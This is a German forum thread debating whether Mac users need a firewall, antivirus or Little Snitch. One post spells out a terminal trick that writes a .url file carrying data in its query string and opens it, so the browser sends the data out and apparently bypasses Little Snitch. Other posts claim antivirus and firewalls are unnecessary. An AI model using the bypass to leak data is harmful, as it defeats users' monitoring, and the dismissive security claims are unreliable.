Firewall für Mac

[lastdragon]

omg das wird echt zu viel und zu detailliert ^^
kann nicht jemand einfach für Noob und fauler sagen, welche Programme unbedingt nötig sind? also die Programme, die 70% der Macusers der Meinung sind, dass die wichtig sind.

 

[waschbär123]

nichts, einfach netwerkdienste ausmachen. tun bestimmt 70% aller MacUser..

 

[pepi]

Wobei man ja nicht sicher sein kann ob nicht irgendeine Applikation auf einmal einen Port aufmacht. Dagegen schützt dann der Firewall für alle Fälle. Am Congress ist sowieso alles aus, und man bewegt sich ohnehin nur per VPN Tunnel. *Paranoia Mode On*
Gruß Pepi

 

[Bananenbieger]

... und man bewegt sich ohnehin nur per VPN Tunnel. *Paranoia Mode On*

Ist *Paranoia Mode* nicht VPN-Tunnel mit OTP-Verschlüsselung?

 

[pepi]

Es gibt garkeine VPNs ohne Verschlüsselung! (Jedenfalls nicht bei mir!) Bei mir gibts genaugenommen garnix ohne Verschlüsselung, kein Mail, kein Chat, kein CMS Administrieren. Garnix.
Gruß Pepi

 

[Bananenbieger]

I know. Es ging um die OTP-Verschlüsselung.

 

[Kaupa]

omg das wird echt zu viel und zu detailliert ^^
kann nicht jemand einfach für Noob und fauler sagen, welche Programme unbedingt nötig sind? also die Programme, die 70% der Macusers der Meinung sind, dass die wichtig sind.

nichts, einfach netwerkdienste ausmachen. tun bestimmt 70% aller MacUser..

Und wenn man jetzt mit dem Rechner ins Netz möchte, muss man ja zwangsläufig wieder Netzwerkdienste zuschalten, oder nicht? Dann wäre doch eine Firewall angebracht, die entscheidet (je nach Einstellung) welches Program welchen Dienst oder Port benutzen darf!?
Ich verstehe bei der Diskusion leider nur Bahnhof und bin ziemlich verunsichert, weil es hier zwei Meinungen über die Notwenidigtkeit von Firewalls gibt.
Auch würde ich gerne wissen, was ihr von Little Snitch haltet...
Thx so far

 

[LL0rd]

Und wenn man jetzt mit dem Rechner ins Netz möchte, muss man ja zwangsläufig wieder Netzwerkdienste zuschalten, oder nicht?

Es geht hier darum, den Zugriff auf einige Ports von Außen zu verhindern.

 

[seno]

Kann jemand ganz schlicht und einfach für den noob erklären welche FireWall Einstelung sinnvoll ist damit alle Programme Problemlos funktionieren aber man sicher ist ?
Möchte nur mich selber (meinen Rechner) Schützen....

 

[LL0rd]

Kann jemand ganz schlicht und einfach für den noob erklären welche FireWall Einstelung sinnvoll ist damit alle Programme Problemlos funktionieren aber man sicher ist ?
Möchte nur mich selber (meinen Rechner) Schützen....

Kommt auf die Bedrohungslage an. In aller Regel würde ich aber trotz der Diskursion zu garkeiner Firewall raten.

 

[Kaupa]

Hi,
selbst wenn man anscheinend keine FW braucht, was ist schlecht daran, wenn man sie trotzdem aktiviert? Auf modernen Rechnern sollte es doch kaum Rechenpower kosten, oder?

 

[LL0rd]

Hi,
selbst wenn man anscheinend keine FW braucht, was ist schlecht daran, wenn man sie trotzdem aktiviert? Auf modernen Rechnern sollte es doch kaum Rechenpower kosten, oder?

Die Medaille hat zwei Seiten. Eine Firewall braucht tatsächlich kaum Leistung. Das ist soweit richtig.

Aber du kannst eine Firewall nicht "einfach so" einschalten. Klar, die arbeitet dann nach irgendwelchen standardmäßig definierten Regeln die irgendwo tief in der Doku beschrieben werden. Und wenn ein Programm nicht funktioniert - weil es dann doch irgendwelche Netzwerkdienste braucht, dann ist man sehr lange auf der Suche.

Deshalb vertrete ich die Meinung, dass eine Firewall nur dann etwas bringt, wenn man die Regeln selbst definiert hat. Ein Standard Ruleset bringt nur Ärger.

 

[Kaupa]

Ok super,
vielen Dank für die Aufklärung!
Ich werde dann an meinem kleinen Powerbook, welches ich nur für Musik und Internet nutze die FW auschalten und gucken, was bzw. ob was passiert

 

[MacMark]

Und wenn man jetzt mit dem Rechner ins Netz möchte, muss man ja zwangsläufig wieder Netzwerkdienste zuschalten …?

Nein, denn Du willst ja die Netzdienste (Server) von anderen Rechner benutzen (ausgehende Anfragen erstellen) und nicht selbst welche anbieten (Server sein, eingehende Anfragen beantworten).

Auch würde ich gerne wissen, was ihr von Little Snitch haltet …

Eine einfache Möglichkeit, um per GUI zu kontrollieren, welche Verbindungen die Programme benutzen, also auch ausgehende Verbindungen.

 

[Kaupa]

Eine einfache Möglichkeit, um per GUI zu kontrollieren, welche Verbindungen die Programme benutzen, also auch ausgehende Verbindungen.

Aha,
also keine ablehnnung Deinerseits, hätte ich garnicht gedacht, weil auf Deiner Seite garnichts zu little snitch steht.
Dann werde ich es mir wohl mal zulegen, als Windowsswitcher bin ich wohl einfach noch sehr paranoid

 

[MacMark]

… weil auf Deiner Seite garnichts zu little snitch steht. …

Litte Snitch wurde in den letzten Versionen in einem Killer-Punkt korrigiert. Deswegen habe ich einen geplanten Artikel nicht geschrieben:

Anfangs lief sein Dämon unter dem jeweilig eingeloggten Benutzer. Dadurch konnte jedes Programm Little Snitch, genauergesagt dessen Dämon, aus- und anschalten und währenddessen ungestört "nach Hause telefonieren".
Es war außerdem ein Design-Fehler, einen Dämon unter einem Login-Account laufen zu lassen, weil ein Dämon nicht für einen speziellen User, sondern systemweite Aufgaben erledigt, und das geht mit einem Login-Account nicht, da der ja nicht immer aktiv ist.

Little Snitch wird gern als "Security"-Programm eingeordnet. Ich halte das für einfältig, denn betrachte mal folgendes Szenario:
Little Snitch benutzt Regeln, die festlegen, welches Programm auf welchem Port Daten rausschicken darf, meinetwegen auch noch an, wen es die schicken darf. Klingt gut, gelle?
So: Deinem Browser wirst Du jede ausgehende Kommunikation auf Port 80 erlauben müssen, egal wohin. Wenn nicht, ist Dein Browser praktisch nutzlos.
Es ist nun aber denkbar, daß ein "unartiges" Programm die Daten gar nicht selbst rausschickt, sondern dem Browser mitteilt, er möge eine bestimmte URL ansurfen und in der URL übergibt man dann ganz viele Daten. Das ist für den Browser technisch so, als wenn Du hier einen Kommentar postest. Die eigentliche Verbindung macht dann der Browser auf und die Daten schickt auch der Browser raus.

Beispiel: Im Terminal diesen Befehl, den jedes Programm absetzen könnte:
echo "URL=http://www.macmark.de?yourdata=all_your_base_is_belong_to_us" > badboy.url
Und dann diesen:
open badboy.url
Was passiert? Dein Browser schickt die angegebenen Daten an mich. Das funktioniert mutmaßlich auch mit aktivem Little Snitch. Mit Zeilenumbruch am Ende sollte es nicht nur auf OS X so klappen.

Man kann also leicht Little Snitch ausweichen. Ich habe das nicht selbst ausprobiert, aber vielleicht testet das mal jemand, der Little Snitch benutzt

Little Snitch installiert meines Wissens eine Kernel-Extension. Prozesse unter root sind immer beliebtes Angriffsziel. Fällt der Prozeß, ist das System meistens Toast (falls nicht sandboxed, siehe meine Seite). Hat Little Snitch einen Bug, hat man ein Problem, denn Little Snitch liest ja jeden ausgehenden Verkehr und ist damit leicht zu erreichen.

Frage: Blockt Little Snitch eigenen Nach-Hause-Verkehr? Vertraut man dem Entwickler des Programmes? Kann man in den Quellcode schauen?

Es gibt auch andere Wege, den Netzverkehr von Programmen zu überwachen, ohne Little Snitch: netstat, tcpdump etc. Alles Bordmittel.

Ich bin sehr vorsichtig damit, was ich als root laufen lasse. Little Snitch läuft bei mir jedenfalls nicht.

 

[Binary]

Das kann ich so nicht bestätigen. Neben meinem MBP habe ich noch ein Desktop Rechner mit Windows, früher XP, heute Vista. Auf dem Rechner habe ich weder eine Firewall noch ein AV Programm drauf. Und der Rechner ist 100% Virenfrei. Denn ich weiß, was ich mache. Und per Mail habe ich seit mehreren Jahren schon keine Viren mehr bekommen.

Eine Firewall braucht man auch nur dann, wenn man verhindern möchte, dass einige Programme nach Hause telefonieren. Für alles andere ist der Router, bzw. das Netzwerk zuständig.

Es gab in Physik mal so einen versuch, da steckt man ein Tier in einen Behälter mit extrem giftigem Zeug, Die chance das das Tier nach so und so lange überlebt war 50 / 50, jedenfalls fand ich die theorie belämmert und zwar ging es nur darum, dass man nicht weiß, ob das Tier nicht tot ist, wenn man nicht nachguckt und wenn man nie nachguckt, dann kann man nie davon ausgehen dass das Tier tot ist (oder so ähnlich).

Erinnert mich stark an diese Aussage.
Wenn du keinen Virenkiller hast, woher willste dann wissen, dass du keinen Virus hast.
Des weiteren gibt es sehr viele unendeckte Viren...

 

[Binary]

Hängt davon ab was du machst.

Bei der Suche mit Google könntest du dir aber einen Virus einfangen.Wenn du viel googelst empfehl ich dir eine.

1.Von der Googlesuche bekommt man sicherlich keinen Virus, höchstens von den darauf verlinkten Seiten
2.Arbeitest du bei der Sicherheitsabteilung von Microsoft?
Da würd es mich nicht wundern, wenn man dort glaubt, eine Firewall schützt vor Viren.

Kennst du vielleicht den Spruch, wenn man keine Ahnung hat, dann einfach mal ... usw.

 

[RedCloud]

Es gab in Physik mal so einen versuch, da steckt man ein Tier in einen Behälter mit extrem giftigem Zeug, Die chance das das Tier nach so und so lange überlebt war 50 / 50, jedenfalls fand ich die theorie belämmert und zwar ging es nur darum, dass man nicht weiß, ob das Tier nicht tot ist, wenn man nicht nachguckt und wenn man nie nachguckt, dann kann man nie davon ausgehen dass das Tier tot ist (oder so ähnlich).

Mir wird übel ...

 

[Bananenbieger]

Steck die Maus in eine Schachtel in der ein Stück Holz und ein Stück Metall ist. Nach einer Stunde lebt die Maus zu 99.99999999999999999% noch.

Steck eine Maus in eine Schachtel mit Zyankali und die Wahrscheinlichkeit, dass die Maus nach einer Stunde noch lebt liegt bei 50%.

Das ist der Unterschied.


Gäbe es übrigens Viren für den Mac, so wären die Viren sicher schon in einer Virusdefintionsdatei aufgetaucht und die Virenscannerhersteller hätten die Presse mit PR-Meldungen zugepflastert, damit sie ihre Scanner auch an Mac-User verkaufen können.